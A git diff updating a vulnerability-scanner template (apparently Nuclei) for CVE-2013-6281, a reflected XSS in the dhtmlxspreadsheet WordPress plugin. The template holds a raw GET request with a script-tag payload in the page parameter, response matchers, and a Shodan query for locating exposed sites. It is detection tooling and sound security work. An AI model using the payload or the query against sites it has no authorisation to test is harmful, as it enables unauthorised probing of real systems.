Update CVE-2013-6281.yaml

patch-1
Prince Chaddha 2022-05-20 00:04:24 +05:30 committed by GitHub
parent 26864671e1
commit 03c59b440c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 16 deletions

View File

@ -4,41 +4,37 @@ info:
name: WordPress Spreadsheet - dhtmlxspreadsheet Plugin Reflected XSS
author: random-robbie
severity: medium
description: TThe dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
description: |
The dhtmlxspreadsheet WordPress plugin was affected by a /dhtmlxspreadsheet/codebase/spreadsheet.php page Parameter Reflected XSS security vulnerability.
reference:
- https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bfc
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
- https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf
- https://www.securityfocus.com/bid/63256/
- https://wordpress.org/plugins/dhtmlxspreadsheet/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2013-6281
cwe-id: CWE-79
tags: cve,cve2013,wordpress,xss,wp-plugin
metadata:
verified: true
shodan-query: inurl:/wp-content/plugins/dhtmlxspreadsheet
tags: cve,cve2013,wordpress,xss,wp-plugin,wp
requests:
- raw:
- |
GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(1);%3C/script%3E HTTP/1.1
GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(1);</script>"
- type: word
part: body
words:
- "page: '<script>alert(document.domain)</script>'"
- "dhx_rel_path"
condition: and
- type: word
part: header